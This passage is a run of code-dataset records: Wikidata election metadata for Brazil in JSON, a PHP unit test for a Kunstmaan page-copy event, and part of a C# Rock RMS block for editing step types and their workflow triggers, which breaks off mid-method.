"lang": "ro", "name": "Alegeri generale în Brazilia", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "fr", "name": "Élection présidentielle brésilienne de 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições presidenciais brasileiras de 1998", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleição presidencial do Brasil em 1998", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "it", "name": "Elezioni generali brasiliane 1998", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "1998-10-04" ], "follows": "Brazilian general election, 1994", "followed_by": "Brazilian general election, 2002", "office": "President of Brazil", "successful_candidates": [ "Fernando Henrique Cardoso" ] }, "Q3722281": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q3722281" } ], "other_names": [ { "lang": "en", "name": "Brazilian parliamentary election, 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "Elezioni parlamentari brasiliane del 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições parlamentares no Brasil em 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "Elezioni generali brasiliane 2010", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "2010-10-03" ] }, "Q3722534": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q3722534" } ], "other_names": [ { "lang": "en", "name": "Brazilian general election, 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 2002", "note": "multilingual", "source": "wikidata-label" }, 
{ "lang": "es", "name": "Elecciones generales de Brasil de 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição presidencial no Brasil em 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt-br", "name": "Eleição presidencial no Brasil em 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "de", "name": "Wahlen in Brasilien 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "fr", "name": "élection présidentielle brésilienne de 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição presidencial brasileira de 2002", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições brasileiras de 2002", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições presidenciais no Brasil em 2002", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "2002-10-27" ], "follows": "Brazilian general election, 1998", "followed_by": "2006 Brazilian presidential election", "office": "President of Brazil", "successful_candidates": [ "Luiz Inácio 'Lula' da Silva" ] }, "Q4958829": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958829" } ], "other_names": [ { "lang": "ro", "name": "Alegeri generale în Brazilia, 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição presidencial brasileira de 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": 
"fr", "name": "Élection présidentielle brésilienne de 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição presidencial de 1994", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "1994-10-03" ], "follows": "Brazilian presidential election, 1989", "followed_by": "Brazilian general election, 1998", "office": "President of Brazil", "successful_candidates": [ "Fernando Henrique Cardoso" ] }, "Q4958841": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958841" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1954", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1954" ] }, "Q4958842": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958842" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1958", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1958" ] }, "Q4958845": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958845" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1947", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1947", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones legislativas de Brasil de 1947", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1947" ] }, "Q4958846": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958846" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1966", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1966", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1966" ] }, "Q4958849": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958849" } ], 
"other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1974", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1974" ] }, "Q4958850": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958850" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1982", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1982", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições Gerais no Brasil em 1982", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "1982" ] }, "Q4958851": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958851" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1986", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1986", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1986" ] }, "Q4958852": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958852" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1990", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni parlamentari in Brasile del 1990", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1990", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1990" ] }, "Q4958898": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958898" } ], "other_names": [ { "lang": "en", "name": "Brazilian general election, 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "eleições gerais no Brasil em 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "fr", "name": "élections générales brésiliennes de 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ru", "name": "Всеобщие выборы в Бразилии", "note": 
"multilingual", "source": "wikidata-label" }, { "lang": "da", "name": "Valgene i Brasilien 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "de", "name": "Wahlen in Brasilien 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "zh", "name": "2014年巴西大选", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt-br", "name": "eleições gerais no Brasil em 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "el", "name": "Βραζιλιάνικες γενικές εκλογές 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ar", "name": "انتخابات البرازيل الرئاسية 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "he", "name": "הבחירות הכלליות בברזיל 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ja", "name": "2014年ブラジル大統領選挙", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ur", "name": "برازیل کے عام انتخابات، 2014ء", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "Eleiciones presidenciales de Brasil de 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "eleições gerais do Brasil de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "eleições gerais do Brasil em 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "eleições gerais no Brasil de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "eleições gerais brasileiras de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "eleições gerais brasileiras em 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais 
do Brasil de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais do Brasil em 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais no Brasil de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais brasileiras de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais brasileiras em 2014", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "2014-10-05", "2014-10-26" ], "follows": "Brazilian presidential election, 2010", "followed_by": "Brazilian general election, 2018", "successful_candidates": [ "Dilma Rousseff" ] } }
{ "pile_set_name": "Github" }
<?php

namespace Kunstmaan\NodeBundle\Tests\Event;

use Kunstmaan\NodeBundle\Entity\HasNodeInterface;
use Kunstmaan\NodeBundle\Entity\Node;
use Kunstmaan\NodeBundle\Entity\NodeTranslation;
use Kunstmaan\NodeBundle\Entity\NodeVersion;
use Kunstmaan\NodeBundle\Event\CopyPageTranslationNodeEvent;
use PHPUnit\Framework\TestCase;

/**
 * Class CopyPageTranslationNodeEventTest
 *
 * Unit test for CopyPageTranslationNodeEvent. Verifies that the "original"
 * values passed to the constructor are exposed through the getOriginal*
 * accessors, and that the corresponding setters overwrite them.
 * (The previous docblock named ConfigureActionMenuEventTest — a copy/paste
 * leftover from another test class.)
 */
class CopyPageTranslationNodeEventTest extends TestCase
{
    /**
     * Round-trips the constructor arguments and the setOriginal* setters
     * through the getOriginal* getters.
     */
    public function testGetSet()
    {
        /** @var Node $node */
        $node = $this->createMock(Node::class);
        /** @var NodeTranslation $nodeTranslation */
        $nodeTranslation = $this->createMock(NodeTranslation::class);
        /** @var NodeVersion $nodeVersion */
        $nodeVersion = $this->createMock(NodeVersion::class);
        $page = $this->createMock(HasNodeInterface::class);

        // The same mocks are reused for both the copied and the "original"
        // halves of the event; 'nl' is the original language code.
        $event = new CopyPageTranslationNodeEvent($node, $nodeTranslation, $nodeVersion, $page, $nodeTranslation, $nodeVersion, $page, 'nl');

        // Values supplied via the constructor are readable.
        $this->assertEquals('nl', $event->getOriginalLanguage());
        $this->assertInstanceOf(NodeTranslation::class, $event->getOriginalNodeTranslation());
        $this->assertInstanceOf(\get_class($page), $event->getOriginalPage());
        $this->assertInstanceOf(NodeVersion::class, $event->getOriginalNodeVersion());

        // Setters accept the same values and the getters still agree.
        $event->setOriginalLanguage('nl');
        $event->setOriginalNodeTranslation($nodeTranslation);
        $event->setOriginalNodeVersion($nodeVersion);
        $event->setOriginalPage($page);

        $this->assertEquals('nl', $event->getOriginalLanguage());
        $this->assertInstanceOf(NodeTranslation::class, $event->getOriginalNodeTranslation());
        $this->assertInstanceOf(\get_class($page), $event->getOriginalPage());
        $this->assertInstanceOf(NodeVersion::class, $event->getOriginalNodeVersion());
    }
}
{ "pile_set_name": "Github" }
// <copyright> // Copyright by the Spark Development Network // // Licensed under the Rock Community License (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.rockrms.com/license // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // </copyright> // using System; using System.Collections.Generic; using System.ComponentModel; using System.Data.Entity; using System.Linq; using System.Web.UI; using System.Web.UI.WebControls; using Newtonsoft.Json; using Rock; using Rock.Attribute; using Rock.Chart; using Rock.Constants; using Rock.Data; using Rock.Model; using Rock.Security; using Rock.Utility; using Rock.Web; using Rock.Web.Cache; using Rock.Web.UI; using Rock.Web.UI.Controls; using Attribute = Rock.Model.Attribute; namespace RockWeb.Blocks.Steps { [DisplayName( "Step Type Detail" )] [Category( "Steps" )] [Description( "Displays the details of the given Step Type for editing." )] #region Block Attributes [BooleanField ( "Show Chart", Key = AttributeKey.ShowChart, DefaultValue = "true", Order = 0 )] [DefinedValueField ( Rock.SystemGuid.DefinedType.CHART_STYLES, "Chart Style", Key = AttributeKey.ChartStyle, DefaultValue = Rock.SystemGuid.DefinedValue.CHART_STYLE_ROCK, Order = 1 )] [SlidingDateRangeField ( "Default Chart Date Range", Key = AttributeKey.SlidingDateRange, DefaultValue = "Current||Year||", EnabledSlidingDateRangeTypes = "Last,Previous,Current,DateRange", Order = 2 )] [CategoryField( "Data View Categories", Key = AttributeKey.DataViewCategories, Description = "The categories from which the Audience and Autocomplete data view options can be selected. 
If empty, all data views will be available.", AllowMultiple = true, EntityTypeName = "Rock.Model.DataView", EntityTypeQualifierColumn = "", EntityTypeQualifierValue = "", IsRequired = false, DefaultValue = "", Category = "", Order = 7 )] [LinkedPage( name: "Bulk Entry Page", description: "The page to use for bulk entry of steps data", required: false, order: 8, key: AttributeKey.BulkEntryPage )] #endregion Block Attributes public partial class StepTypeDetail : RockBlock, IDetailBlock { #region Attribute Keys /// <summary> /// Keys to use for Block Attributes /// </summary> private static class AttributeKey { /// <summary> /// The show chart /// </summary> public const string ShowChart = "ShowChart"; /// <summary> /// The chart style /// </summary> public const string ChartStyle = "ChartStyle"; /// <summary> /// The sliding date range /// </summary> public const string SlidingDateRange = "SlidingDateRange"; /// <summary> /// The data view categories /// </summary> public const string DataViewCategories = "DataViewCategories"; /// <summary> /// The bulk entry page /// </summary> public const string BulkEntryPage = "BulkEntryPage"; } #endregion Attribute Keys #region Page Parameter Keys /// <summary> /// Keys to use for Page Parameters /// </summary> private static class PageParameterKey { /// <summary> /// The step type identifier /// </summary> public const string StepTypeId = "StepTypeId"; /// <summary> /// The step program identifier /// </summary> public const string StepProgramId = "ProgramId"; } #endregion Page Parameter Keys #region Properties private List<Attribute> AttributesState { get; set; } private List<StepWorkflowTriggerViewModel> WorkflowsState { get; set; } #endregion #region Private Variables private int _stepProgramId = 0; private int _stepTypeId = 0; private RockContext _dataContext = null; private bool _blockContextIsValid = false; #endregion Private Variables #region Control Methods /// <summary> /// Raises the <see 
cref="E:System.Web.UI.Control.Init" /> event. /// </summary> /// <param name="e">An <see cref="T:System.EventArgs" /> object that contains the event data.</param> protected override void OnInit( EventArgs e ) { base.OnInit( e ); InitializeBlockNotification( nbBlockStatus, pnlDetails ); InitializeSettingsNotification( upStepType ); _blockContextIsValid = InitializeBlockContext(); if ( !_blockContextIsValid ) { return; } InitializeChartScripts(); InitializeChartFilter(); dvpAutocomplete.EntityTypeId = EntityTypeCache.Get( typeof( Rock.Model.Person ) ).Id; dvpAutocomplete.CategoryGuids = GetAttributeValue( AttributeKey.DataViewCategories ).SplitDelimitedValues().AsGuidList(); dvpAudience.EntityTypeId = EntityTypeCache.Get( typeof( Rock.Model.Person ) ).Id; dvpAudience.CategoryGuids = GetAttributeValue( AttributeKey.DataViewCategories ).SplitDelimitedValues().AsGuidList(); bool editAllowed = IsUserAuthorized( Authorization.EDIT ); InitializeAttributesGrid( editAllowed ); InitializeWorkflowGrid( editAllowed ); btnDelete.Attributes["onclick"] = string.Format( "javascript: return Rock.dialogs.confirmDelete(event, '{0}', 'This will also delete the associated step participants.');", StepType.FriendlyTypeName ); btnSecurity.EntityTypeId = EntityTypeCache.Get( typeof( Rock.Model.StepType ) ).Id; } /// <summary> /// Raises the <see cref="E:System.Web.UI.Control.Load" /> event. /// </summary> /// <param name="e">The <see cref="T:System.EventArgs" /> object that contains the event data.</param> protected override void OnLoad( EventArgs e ) { base.OnLoad( e ); if ( !_blockContextIsValid ) { return; } if ( !Page.IsPostBack ) { ShowDetail( _stepTypeId ); } else { RefreshChart(); } } /// <summary> /// Restores the view-state information from a previous user control request that was saved by the <see cref="M:System.Web.UI.UserControl.SaveViewState" /> method. 
/// <summary>
/// Restores the view-state information from a previous user control request that was saved by the <see cref="M:System.Web.UI.UserControl.SaveViewState" /> method.
/// </summary>
/// <param name="savedState">An <see cref="T:System.Object" /> that represents the user control state to be restored.</param>
protected override void LoadViewState( object savedState )
{
    base.LoadViewState( savedState );

    LoadAttributesViewState();

    // Rehydrate the workflow trigger collection; fall back to an empty list when
    // nothing usable was stored.
    var storedTriggerJson = ViewState["WorkflowsState"] as string;

    this.WorkflowsState = JsonConvert.DeserializeObject<List<StepWorkflowTriggerViewModel>>( storedTriggerJson ?? string.Empty )
                          ?? new List<StepWorkflowTriggerViewModel>();
}

/// <summary>
/// Saves any user control view-state changes that have occurred since the last page postback.
/// </summary>
/// <returns>
/// Returns the user control's current view state. If there is no view state associated with the control, it returns null.
/// </returns>
protected override object SaveViewState()
{
    var serializerSettings = new JsonSerializerSettings
    {
        ReferenceLoopHandling = ReferenceLoopHandling.Ignore,
        NullValueHandling = NullValueHandling.Ignore
    };

    SaveAttributesViewState( serializerSettings );

    ViewState["WorkflowsState"] = JsonConvert.SerializeObject( WorkflowsState, Formatting.None, serializerSettings );

    return base.SaveViewState();
}

/// <summary>
/// Returns breadcrumbs specific to the block that should be added to navigation
/// based on the current page reference. This function is called during the page's
/// oninit to load any initial breadcrumbs
/// </summary>
/// <param name="pageReference">The page reference.</param>
/// <returns></returns>
public override List<BreadCrumb> GetBreadCrumbs( PageReference pageReference )
{
    var crumbs = new List<BreadCrumb>();

    int? stepTypeId = PageParameter( pageReference, PageParameterKey.StepTypeId ).AsIntegerOrNull();

    if ( stepTypeId == null )
    {
        // Without a page parameter there is no breadcrumb to show.
        return crumbs;
    }

    var stepType = new StepTypeService( GetDataContext() ).Get( stepTypeId.Value );

    var crumbTitle = ( stepType != null ) ? stepType.Name : "New Step Type";

    crumbs.Add( new BreadCrumb( crumbTitle, pageReference ) );

    return crumbs;
}

/// <summary>
/// Navigate to the step program page
/// </summary>
private void GoToStepProgramPage()
{
    var navigationParams = new Dictionary<string, string>
    {
        { PageParameterKey.StepProgramId, _stepProgramId.ToString() }
    };

    NavigateToParentPage( navigationParams );
}

#endregion

#region Events

#region Control Events

/// <summary>
/// Handles the Click event of the btnBulkEntry control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param>
protected void btnBulkEntry_Click( object sender, EventArgs e )
{
    var navigationParams = new Dictionary<string, string>();

    var stepType = GetStepType();

    if ( stepType != null )
    {
        navigationParams[PageParameterKey.StepTypeId] = stepType.Id.ToString();
    }

    NavigateToLinkedPage( AttributeKey.BulkEntryPage, navigationParams );
}

/// <summary>
/// Refresh the Steps Activity Chart.
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
protected void btnRefreshChart_Click( object sender, EventArgs e )
{
    RefreshChart();
}

/// <summary>
/// Handles the Click event of the btnEdit control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param>
protected void btnEdit_Click( object sender, EventArgs e )
{
    ShowEditDetails( GetStepType() );
}
/// <summary>
/// Handles the Click event of the btnDelete control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param>
protected void btnDelete_Click( object sender, EventArgs e )
{
    DeleteRecord();
}

/// <summary>
/// Handles the Click event of the btnSave control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param>
protected void btnSave_Click( object sender, EventArgs e )
{
    var recordId = SaveRecord();

    if ( recordId <= 0 )
    {
        // Save failed; validation messages are already displayed by the controls.
        return;
    }

    // Update the query string for this page and reload.
    var qryParams = new Dictionary<string, string>();

    qryParams[PageParameterKey.StepTypeId] = recordId.ToString();

    NavigateToPage( RockPage.Guid, qryParams );
}

/// <summary>
/// Save the current record: basic properties, workflow triggers, prerequisites,
/// advanced settings, and the participant attribute definitions.
/// </summary>
/// <returns>The Id of the new record, or a non-positive value if the process could not be completed.</returns>
private int SaveRecord()
{
    StepType stepType;

    var rockContext = GetDataContext();

    var stepTypeService = new StepTypeService( rockContext );
    var stepWorkflowService = new StepWorkflowService( rockContext );
    var stepWorkflowTriggerService = new StepWorkflowTriggerService( rockContext );

    int stepTypeId = int.Parse( hfStepTypeId.Value );

    if ( stepTypeId == 0 )
    {
        stepType = new StepType();
        stepType.StepProgramId = _stepProgramId;

        stepTypeService.Add( stepType );
    }
    else
    {
        stepType = stepTypeService.Queryable()
                                  .Include( x => x.StepWorkflowTriggers )
                                  .Where( c => c.Id == stepTypeId )
                                  .FirstOrDefault();

        if ( stepType == null )
        {
            // The record no longer exists (deleted by another user since the edit
            // started). Fail the save rather than throwing a NullReferenceException.
            return -1;
        }
    }

    // Workflow Triggers: Remove triggers deleted in the UI, together with any Step
    // workflows that were started by them.
    var uiWorkflows = WorkflowsState.Select( l => l.Guid );

    var deletedTriggers = stepType.StepWorkflowTriggers.Where( l => !uiWorkflows.Contains( l.Guid ) ).ToList();

    foreach ( var trigger in deletedTriggers )
    {
        // Remove the Step workflows associated with this trigger.
        var stepWorkflows = stepWorkflowService.Queryable().Where( w => w.StepWorkflowTriggerId == trigger.Id );

        foreach ( var requestWorkflow in stepWorkflows )
        {
            stepWorkflowService.Delete( requestWorkflow );
        }

        // Remove the trigger.
        stepType.StepWorkflowTriggers.Remove( trigger );
        stepWorkflowTriggerService.Delete( trigger );
    }

    // Workflow Triggers: Add new triggers and update modified ones from the UI state.
    foreach ( var stateTrigger in WorkflowsState )
    {
        var workflowTrigger = stepType.StepWorkflowTriggers.Where( a => a.Guid == stateTrigger.Guid ).FirstOrDefault();

        if ( workflowTrigger == null )
        {
            workflowTrigger = new StepWorkflowTrigger();
            workflowTrigger.StepProgramId = stepType.StepProgramId;

            stepType.StepWorkflowTriggers.Add( workflowTrigger );
        }

        workflowTrigger.Guid = stateTrigger.Guid;
        // NOTE: the original code assigned WorkflowTypeId twice; the duplicate has been removed.
        workflowTrigger.WorkflowTypeId = stateTrigger.WorkflowTypeId;
        workflowTrigger.TriggerType = stateTrigger.TriggerType;
        workflowTrigger.TypeQualifier = stateTrigger.TypeQualifier;
        workflowTrigger.WorkflowName = stateTrigger.WorkflowTypeName;
    }

    // Update Basic properties
    stepType.Name = tbName.Text;
    stepType.IsActive = cbIsActive.Checked;
    stepType.Description = tbDescription.Text;
    stepType.IconCssClass = tbIconCssClass.Text;
    stepType.HighlightColor = cpHighlight.Value;
    stepType.ShowCountOnBadge = cbShowBadgeCount.Checked;
    stepType.HasEndDate = cbHasDuration.Checked;
    stepType.AllowMultiple = cbAllowMultiple.Checked;

    // Update Prerequisites
    var uiPrerequisiteStepTypeIds = cblPrerequsities.SelectedValuesAsInt;

    var removePrerequisiteStepTypes = stepType.StepTypePrerequisites.Where( x => !uiPrerequisiteStepTypeIds.Contains( x.PrerequisiteStepTypeId ) ).ToList();

    var prerequisiteService = new StepTypePrerequisiteService( rockContext );

    foreach ( var prerequisiteStepType in removePrerequisiteStepTypes )
    {
        stepType.StepTypePrerequisites.Remove( prerequisiteStepType );
        prerequisiteService.Delete( prerequisiteStepType );
    }

    var existingPrerequisiteStepTypeIds = stepType.StepTypePrerequisites.Select( x => x.PrerequisiteStepTypeId ).ToList();

    // Only accept selected ids that correspond to actual StepType records.
    // (Filter in the database instead of materializing every StepType.)
    var addPrerequisiteStepTypeIds = stepTypeService.Queryable()
        .Where( x => uiPrerequisiteStepTypeIds.Contains( x.Id ) )
        .Select( x => x.Id )
        .ToList()
        .Where( id => !existingPrerequisiteStepTypeIds.Contains( id ) )
        .ToList();

    foreach ( var prerequisiteStepTypeId in addPrerequisiteStepTypeIds )
    {
        var newPrerequisite = new StepTypePrerequisite();
        newPrerequisite.StepTypeId = stepType.Id;
        newPrerequisite.PrerequisiteStepTypeId = prerequisiteStepTypeId;

        stepType.StepTypePrerequisites.Add( newPrerequisite );
    }

    // Validate Prerequisites.
    // This is necessary because other Step Types may have been modified after this record edit was started.
    if ( _stepTypeId > 0 )
    {
        var eligibleStepTypeIdList = stepTypeService.GetEligiblePrerequisiteStepTypes( _stepTypeId ).Select( x => x.Id ).ToList();

        foreach ( var prerequisite in stepType.StepTypePrerequisites )
        {
            if ( !eligibleStepTypeIdList.Contains( prerequisite.PrerequisiteStepTypeId ) )
            {
                var prerequisiteStepType = stepTypeService.Get( prerequisite.PrerequisiteStepTypeId );

                cvStepType.IsValid = false;
                cvStepType.ErrorMessage = string.Format( "This Step Type cannot have prerequisite \"{0}\" because it is already a prerequisite of that Step Type.", prerequisiteStepType.Name );

                return 0;
            }
        }
    }

    // Update Advanced Settings
    stepType.AutoCompleteDataViewId = dvpAutocomplete.SelectedValueAsId();
    stepType.AudienceDataViewId = dvpAudience.SelectedValueAsId();
    stepType.AllowManualEditing = cbAllowEdit.Checked;
    stepType.CardLavaTemplate = ceCardTemplate.Text;

    if ( !stepType.IsValid )
    {
        // Controls will render the error messages
        return -1;
    }

    // Save the Step Type and the associated Attributes in a single transaction so a
    // failed attribute save does not leave a partially-updated Step Type.
    rockContext.WrapTransaction( () =>
    {
        rockContext.SaveChanges();

        Helper.SaveAttributeEdits( AttributesState, new Step().TypeId, "StepTypeId", stepType.Id.ToString(), rockContext );
    } );

    return stepType.Id;
}

/// <summary>
/// Handles the Click event of the btnCancel control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param>
protected void btnCancel_Click( object sender, EventArgs e )
{
    if ( hfStepTypeId.Value.Equals( "0" ) )
    {
        // Cancelling a new record returns to the parent Step Program page.
        GoToStepProgramPage();
    }
    else
    {
        ShowReadonlyDetails( GetStepType() );
    }
}

/// <summary>
/// Handles the BlockUpdated event of the control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param>
protected void Block_BlockUpdated( object sender, EventArgs e )
{
    this.NavigateToCurrentPageReference();
}

#endregion

#region StepWorkflow Events

/// <summary>
/// Handles the SaveClick event of the dlgStepWorkflow control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param>
protected void dlgStepWorkflow_SaveClick( object sender, EventArgs e )
{
    SaveWorkflowProperties();
}

/// <summary>
/// Handles the Delete event of the gWorkflows control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="RowEventArgs"/> instance containing the event data.</param>
protected void gWorkflows_Delete( object sender, RowEventArgs e )
{
    Guid rowGuid = ( Guid ) e.RowKeyValue;

    var workflowTypeStateObj = WorkflowsState.Where( g => g.Guid.Equals( rowGuid ) ).FirstOrDefault();

    if ( workflowTypeStateObj != null )
    {
        WorkflowsState.Remove( workflowTypeStateObj );
    }

    BindStepWorkflowsGrid();
}
/// <summary>
/// Handles the GridRebind event of the gWorkflows control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param>
private void gWorkflows_GridRebind( object sender, EventArgs e )
{
    BindStepWorkflowsGrid();
}

/// <summary>
/// Handles the Edit event of the gWorkflows control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="RowEventArgs"/> instance containing the event data.</param>
protected void gWorkflows_Edit( object sender, RowEventArgs e )
{
    var selectedTriggerGuid = ( Guid ) e.RowKeyValue;

    gWorkflows_ShowEdit( selectedTriggerGuid );
}

/// <summary>
/// Show the edit dialog for the specified Workflow Trigger.
/// </summary>
/// <param name="triggerGuid">The workflow trigger unique identifier.</param>
protected void gWorkflows_ShowEdit( Guid triggerGuid )
{
    ShowWorkflowTriggerPropertiesDialog( triggerGuid );
}

/// <summary>
/// Handles the Add event of the gWorkflows control.
/// Opens the trigger properties dialog for a new (empty) trigger.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param>
private void gWorkflows_Add( object sender, EventArgs e )
{
    gWorkflows_ShowEdit( Guid.Empty );
}

/// <summary>
/// Handles the SelectedIndexChanged event of the ddlTriggerType control.
/// </summary>
/// <param name="sender">The source of the event.</param>
/// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param>
protected void ddlTriggerType_SelectedIndexChanged( object sender, EventArgs e )
{
    UpdateTriggerQualifiers();
}
/// <summary>
/// Show the edit dialog for the specified Workflow Trigger.
/// </summary>
/// <param name="triggerGuid">The workflow trigger unique identifier; Guid.Empty creates a new trigger.</param>
private void ShowWorkflowTriggerPropertiesDialog( Guid triggerGuid )
{
    var workflowTrigger = WorkflowsState.FirstOrDefault( l => l.Guid.Equals( triggerGuid ) );

    if ( workflowTrigger != null )
    {
        wpWorkflowType.SetValue( workflowTrigger.WorkflowTypeId );
        ddlTriggerType.SelectedValue = workflowTrigger.TriggerType.ToString();
    }
    else
    {
        // Set default values
        wpWorkflowType.SetValue( null );
        ddlTriggerType.SelectedValue = StepWorkflowTrigger.WorkflowTriggerCondition.IsComplete.ToString();
    }

    // Remember which trigger is being edited so SaveWorkflowProperties can find it.
